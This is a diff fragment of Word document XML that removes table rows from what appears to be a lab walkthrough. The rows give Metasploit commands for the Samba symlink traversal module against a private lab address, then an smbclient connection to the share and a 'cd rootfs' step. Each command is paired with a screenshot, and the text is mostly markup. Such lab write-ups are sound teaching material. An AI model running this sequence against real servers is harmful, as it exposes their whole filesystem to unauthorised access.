+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B2EE81C" wp14:editId="118B4C72">
+                  <wp:extent cx="2990850" cy="819150"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="52" name="Picture 52"/>
                   <wp:cNvGraphicFramePr>
                     <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                   </wp:cNvGraphicFramePr>
@@ -13401,1055 +12721,6 @@
                         <pic:spPr>
                           <a:xfrm>
                             <a:off x="0" y="0"/>
-                            <a:ext cx="3999230" cy="1881505"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="327"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>msfconsole</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47571365" wp14:editId="728FE972">
-                  <wp:extent cx="3999230" cy="2696210"/>
-                  <wp:effectExtent l="0" t="0" r="1270" b="8890"/>
-                  <wp:docPr id="40" name="Picture 40"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId46"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3999230" cy="2696210"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="327"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>use auxiliary/admin/smb/samba_symlink_traversal</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DDA7F78" wp14:editId="42590ADE">
-                  <wp:extent cx="3994150" cy="424815"/>
-                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-                  <wp:docPr id="41" name="Picture 41"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId47"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3994150" cy="424815"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="377"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>set RHOST 192.168.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>177</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>.1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>28</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="796F0840" wp14:editId="339C7CFB">
-                  <wp:extent cx="3994150" cy="205105"/>
-                  <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
-                  <wp:docPr id="42" name="Picture 42"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId48"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3994150" cy="205105"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="431"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>set SMBSHARE tmp</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="363FDCA8" wp14:editId="4B00DDD1">
-                  <wp:extent cx="3994150" cy="274320"/>
-                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-                  <wp:docPr id="43" name="Picture 43"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId49"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3994150" cy="274320"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="1439"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>exploit</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D3CEDD2" wp14:editId="157C6895">
-                  <wp:extent cx="3994150" cy="908050"/>
-                  <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
-                  <wp:docPr id="44" name="Picture 44"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId50"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3994150" cy="908050"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="1331"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>exit</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14347706" wp14:editId="3BC6D854">
-                  <wp:extent cx="3937000" cy="784225"/>
-                  <wp:effectExtent l="0" t="0" r="6350" b="0"/>
-                  <wp:docPr id="45" name="Picture 45"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId51"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3937000" cy="784225"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="1349"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>smbclient //192.168.</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>177</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>.1</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>28</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>/tmp</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09C95E33" wp14:editId="0D2F819A">
-                  <wp:extent cx="3590925" cy="828675"/>
-                  <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
-                  <wp:docPr id="46" name="Picture 46"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId52"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="3590925" cy="828675"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
-                          </a:prstGeom>
-                        </pic:spPr>
-                      </pic:pic>
-                    </a:graphicData>
-                  </a:graphic>
-                </wp:inline>
-              </w:drawing>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="611"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3240" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:lang w:val="lt-LT"/>
-              </w:rPr>
-              <w:t>cd rootfs</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="6210" w:type="dxa"/>
-            <w:tcBorders>
-              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
-            </w:tcBorders>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyText"/>
-              <w:spacing w:after="0"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-              <w:drawing>
-                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44DE0726" wp14:editId="14C51F7D">
-                  <wp:extent cx="1676400" cy="361950"/>
-                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                  <wp:docPr id="47" name="Picture 47"/>
-                  <wp:cNvGraphicFramePr>
-                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-                  </wp:cNvGraphicFramePr>
-                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                        <pic:nvPicPr>
-                          <pic:cNvPr id="1" name=""/>
-                          <pic:cNvPicPr/>
-                        </pic:nvPicPr>
-                        <pic:blipFill>
-                          <a:blip r:embed="rId53"/>
-                          <a:stretch>
-                            <a:fillRect/>
-                          </a:stretch>
-                        </pic:blipFill>
-                        <pic:spPr>
-                          <a:xfrm>
-                            <a:off x="0" y="0"/>
-                            <a:ext cx="1676400" cy="361950"/>
-                          </a:xfrm>
-                          <a:prstGeom prst="rect">
-                            <a:avLst/>
